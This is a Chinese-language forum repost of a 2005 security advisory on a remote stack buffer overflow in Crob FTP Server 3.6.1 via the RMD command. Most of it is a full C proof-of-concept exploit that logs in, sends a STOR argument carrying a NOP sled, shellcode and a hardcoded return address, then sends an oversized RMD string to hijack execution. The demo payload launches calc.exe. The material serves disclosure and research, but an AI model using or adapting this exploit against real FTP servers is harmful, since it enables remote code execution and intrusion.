返回列表 发帖

Crob FTP Server远程RMD命令栈溢出漏洞

受影响系统: Crob Crob FTP Server 3.6.1 描述: -------------------------------------------------------------------------------- BUGTRAQ ID: _blank>13847 Crob Ftp Server是一款简单易用的FTP服务程序。 Crob FTP Server在处理客户端请求时存在缓冲区溢出漏洞。 如果攻击者能够向任意FTP命令(例如STOR)提供超长参数然后以很长的参数调用RMD命令的话,就可以触发栈溢出。成功利用这个漏洞的攻击者可在服务器上以执行代码。 <*来源:Leon Juranic (ljuranic@LSS.hr) 链接:_blank>http://security.lss.hr/en/index.php?page=details&ID=LSS-2005-06-06 *> 测试方法: -------------------------------------------------------------------------------- 警 告 以下程序(方法)可能带有攻击性,仅供安全研究与教学之用。使用者风险自负! /* * CrobFTP remote stack overflow PoC * --------------------------------- * Tested on Crob FTP Server 3.6.1, Windows XP * * Coded by Leon Juranic * LSS Security / _blank>http://security.lss.hr * */ #include #include #include #pragma comment (lib,"ws2_32") char *fzz_recv (int sock) { fd_set fds; struct timeval tv; static char buf[10000]; char *ptr=buf; int n; tv.tv_sec = 5; tv.tv_usec = 0; FD_ZERO(&fds); FD_SET(sock,&fds); if (select(NULL,&fds,NULL,NULL,&tv) != 0) { if (FD_ISSET (sock,&fds)) n=recv (sock,ptr,sizeof(buf),0); buf[n-1] = ';\0';; printf ("RECV: %s\n",buf); return buf; } else { return NULL; } } int login (int sock, char *user, char *pass) { char buf[1024], *bla; bla=fzz_recv(sock); printf ("recv: %s\n",bla); sprintf (buf,"USER %s\r\n",user); send (sock,buf,strlen(buf),0); bla=fzz_recv(sock); printf ("recv: %s\n",bla); sprintf (buf,"PASS %s\r\n",pass); send (sock,buf,strlen(buf),0); bla=fzz_recv(sock); printf ("recv: %s\n",bla); if (strcmp("230",bla) != NULL) return 0; else return -1; return 0; } void lame_sploit (char *pack, char *user, char *pass) { WORD wVersionRequested; WSADATA wsaData; int sock, err,x; struct sockaddr_in sin; char buf[2000],tmp[1000]; char *shell= // 5 min. XP SP1 shellcode "\x33\xc0" // xor eax,eax "\x50" // push eax (\0) "\x68\x2e\x65\x78\x65" // push ';.exe'; "\x68\x63\x61\x6c\x63" // push ';calc'; "\x54" // push esp "\xba\x44\x80\xc2\x77" // mov edx, 77c28044 "\xff\xd2"; // call edx (system) wVersionRequested = MAKEWORD( 2, 2 ); err = WSAStartup( wVersionRequested, &wsaData ); if ( err != 0 ) { printf ("ERROR: Sorry, cannot create socket!!!\n"); ExitProcess(-1); } sock=socket(AF_INET,SOCK_STREAM,0); sin.sin_family=AF_INET; sin.sin_addr.s_addr = inet_addr(pack); sin.sin_port = htons(21); if (connect(sock,(struct sockaddr*)&sin, sizeof(struct sockaddr)) == -1) { printf ("CONNECT :(((\n"); ExitProcess(-1); } if (login(sock,user,pass) == -1) { printf ("ERROR: Cannot login to FTP server, sorry!!!\n"); exit(-1); } memset(tmp,0,sizeof(tmp)); memset (tmp,0x90,180); memcpy (&tmp[80],shell,strlen(shell)); *(long*)&tmp[158] = 0x77da52b8; // EIP -> ret into ';jmp esp'; *(long*)&tmp[166] = 0x74ec8390; // sub esp,0x74 *(long*)&tmp[170] = 0x9090e4ff; // jmp esp _snprintf (buf,sizeof(buf),"STOR %s\r\n", tmp); printf ("DEBUG: %.30s %d\n",buf,strlen(buf)); send (sock,buf,strlen(buf),0); printf ("%s\n",fzz_recv(sock)); strcpy(buf,"RMD "); for (x=0;x<276;x++) strcat (buf,".../"); strcat(buf,"\r\n"); printf ("Sending exploit strings\n"); send (sock,buf,strlen(buf),0); printf ("recv: %s\n",fzz_recv(sock)); } main (int argc, char **argv) { printf ("CrobFTP Stack overflow PoC \n" "Coded by Leon Juranic \n" "LSS Security / _blank>http://security.lss.hr/\n"); if (argc < 4 ) { printf ("\nusage: %s \n",argv[0]); exit(-1); } lame_sploit(argv[1],argv[2],argv[3]); } 建议: -------------------------------------------------------------------------------- 厂商补丁: Crob ---- 目前厂商还没有提供补丁或者升级程序,我们建议使用此软件的用户随时关注厂商的主页以获取最新版本: _blank>http://www.crob.net/studio/ftpserver/

返回列表 回复 发帖